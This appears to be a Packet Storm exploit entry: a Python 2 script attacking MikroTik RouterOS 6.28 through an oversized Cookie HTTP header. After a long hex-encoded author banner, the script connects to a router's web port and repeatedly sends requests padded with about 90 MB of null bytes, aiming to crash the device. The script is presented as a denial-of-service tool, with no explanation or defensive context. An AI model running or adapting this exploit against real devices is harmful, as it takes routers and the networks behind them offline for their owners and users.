Mikrotik RouterOS 6.28 Cookie Buffer Overflow

2017-06-16T00:00:00
ID PACKETSTORM:142987
Type packetstorm
Reporter sultan albalawi
Modified 2017-06-16T00:00:00

Description

                                        
                                            `# mikrotik RouterOS v6.28 Cookie HTTP request header Buffer Overflow  
# sultan albalawi  
import socket  
import sys  
from time import sleep  
def myB():  
print "\x27\x27\x27\x0d\x0a\x20\x20\x20\x20\x20" \  
"\x20\x20\x5c\x20\x20\x20\x2d\x20\x20\x2d\x20" \  
"\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e" \  
"\x20\x20\x2d\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d" \  
"\x20\x2d\x20\x20\x2d\x20\x2d\x20\x20\x2d\x20" \  
"\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a" \  
"\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c" \  
"\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74" \  
"\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a" \  
"\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a" \  
"\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20" \  
"\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20" \  
"\x60\x2e\x20\x20\x20\x20\x2c\x3b\x27\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70" \  
"\x50\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a" \  
"\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x58\x20" \  
"\x2f\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20" \  
"\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a" \  
"\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20" \  
"\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f" \  
"\x60\x20\x60\x20\x28\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c" \  
"\x0d\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x20" \  
"\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x64" \  
"\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20\x20" \  
"\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74" \  
"\x79\x60\x20\x20\x27\x20\x30\x20\x20\x30\x20" \  
"\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a" \  
"\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20" \  
"\x20\x20\x20\x20\x7c\x0d\x0a\x20\x20\x20\x20" \  
"\x2c\x20\x20\x20\x20\x20\x20\x20\x2c\x20\x20" \  
"\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a" \  
"\x2a\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20" \  
"\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20" \  
"\x20\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20" \  
"\x20\x60\x2e\x5f\x2e\x27\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c" \  
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d" \  
"\x5e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60\x20" \  
"\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d" \  
"\x2d\x2c\x2e\x2e\x5f\x3b\x2d\x2d\x2d\x3e\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20" \  
"\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f" \  
"\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a" \  
"\x20\x20\x27\x20\x60\x20\x20\x20\x20\x2c\x20" \  
"\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x5e\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65" \  
"\x77\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20" \  
"\x20\x20\x60\x2e\x5f\x20\x2c\x20\x20\x27\x20" \  
"\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x7c\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x7c" \  
"\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x3b\x20\x2c\x27\x27\x2d\x2c\x3b\x27\x20\x60" \  
"\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f" \  
"\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x60\x60" \  
"\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d\x2d\x60\x20" \  
"\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20" \  
"\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x5e\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x27\x2e\x20\x5f\x2d\x2d\x2d" \  
"\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f" \  
"\x5f\x5f\x20\x7c\x5f\x20\x20\x49\x50\x53\x20" \  
"\x20\x20\x20\x20\x29\x0d\x0a\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20" \  
"\x20\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \  
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \  
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \  
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \  
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d" \  
"\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x53\x75\x6c\x74\x61\x6e\x20" \  
"\x41\x6c\x62\x61\x6c\x61\x77\x69\x0d\x0a\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x68\x74\x74\x70\x73" \  
"\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65" \  
"\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65" \  
"\x6e\x74\x65\x73\x74\x33\x0d\x0a\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x61" \  
"\x6c\x62\x61\x6c\x61\x77\x69\x34\x70\x65\x6e" \  
"\x74\x65\x73\x74\x40\x67\x6d\x61\x69\x6c\x2e" \  
"\x63\x6f\x6d\x0d\x0a\x20\x20\x20\x20\x20\x20" \  
"\x20\x20\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \  
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \  
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \  
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \  
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d" \  
"\t\t\t\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61" \  
"\x63\x6b\x65\x74\x73\x74\x6f\x72\x6d\x73\x65\x63" \  
"\x75\x72\x69\x74\x79\x2e\x63\x6f\x6d\x2f\x66\x69" \  
"\x6c\x65\x73\x2f\x61\x75\x74\x68\x6f\x72\x2f\x31\x32\x35\x38\x36\x2f\r\n"\  
"\x20\x20\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \  
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \  
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \  
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \  
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d" \  
  
myB()  
  
  
try:  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
except socket.error:  
print 'Failed to create socket'  
sys.exit()  
  
host = '192.168.88.1'  
port = 80  
  
  
s.connect((host, port))  
print 'Socket Connected to ' +host  
header = ['GET /',  
'CONNECT /',  
'DELETE /',  
'TRACE /',  
'HEAD /',  
'OPTIONS /',  
'PATCH /',  
'POST /',  
'PUT /',  
'Forwarded:',  
'Content-Language: ',  
'Location:',  
'Proxy-Authenticate:',  
'Proxy-Authorization:',  
'Range:',  
'WWW-Authenticate:',  
'X-Forwarded-For:',  
'X-Forwarded-Host:',  
'X-Forwarded-Proto:',  
'Accept:',  
'Accept-Charset:',  
'Accept-Encoding:',  
'X-Forwarded-Proto:',  
'Front-End-Https:',  
'X-Forwarded-Protocol:',  
'X-Forwarded-Ssl:',  
'X-Url-Scheme:',  
'Accept-Language:',  
'Accept-Ranges:',  
'Access-Control-Allow-Credentials:',  
'Access-Control-Allow-Headers:',  
'Access-Control-Allow-Methods:',  
'Access-Control-Allow-Origin:',  
'Access-Control-Expose-Headers:',  
'Access-Control-Max-Age:',  
'Access-Control-Request-Headers:',  
'Access-Control-Request-Method:',  
'Age:',  
'Cache-Control:',  
'Connection:',  
'Content-Disposition:',  
'Content-Encoding:',  
'Content-Length:',  
'Content-Location:',  
'Content-Security-Policy:',  
'Content-Security-Policy-Report-Only:',  
'Content-Type:',  
'Cookie:',  
'Cookie2:',  
'DNT:',  
'Date:',  
'ETag:',  
'Expires:',  
'From:',  
'Host:',  
'If-Match:',  
'If-Modified-Since:',  
'If-None-Match:',  
'If-Range:',  
'If-Unmodified-Since:',  
'Keep-Alive:',  
'Last-Modified:',  
'Location:',  
'Origin:',  
'Pragma:',  
'Public-Key-Pins:',  
'Public-Key-Pins-Report-Only:',  
'Referer:',  
'Referrer-Policy:',  
'Retry-After:',  
'Server:',  
'Set-Cookie:',  
'Set-Cookie2:',  
'Strict-Transport-Security:',  
'TE:',  
'Tk:',  
'Trailer:',  
'Transfer-Encoding:',  
'Upgrade-Insecure-Requests:',  
'User-Agent:',  
'Vary:',  
'Via:',  
'Warning:',  
'X-Content-Type-Options:',  
'X-DNS-Prefetch-Control:',  
'X-Frame-Options:',  
'X-XSS-Protection:']  
print "http_heders : ",len(header)  
m=len(header)  
print header[47] +"this vulnerability "  
for i in range(m):  
A="\0"*90590000  
message=("GET /graphs/ HTTP/1.1\r\n"  
"Host: "+host+"\r\n"  
"Accept: */*\r\n"  
"Accept-Language: en\r\n"  
"User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\r\n"  
"Connection: close\r\n"  
"Referer:"+host+'/graphs\r\n'+  
header[47]+"username="+A)  
try:  
s.sendall(message)  
print "send pyload ok..."  
#s.sendall(message)  
except socket.error:  
print 'Send failed'  
sys.exit()  
sleep(30)  
for re in range(1,20):  
print re  
print "mikrotik RouterOS v6.28 stopping"  
  
#reply = s.recv(4096)  
#sss=s.recv(4096)  
#print reply  
#print sss  
`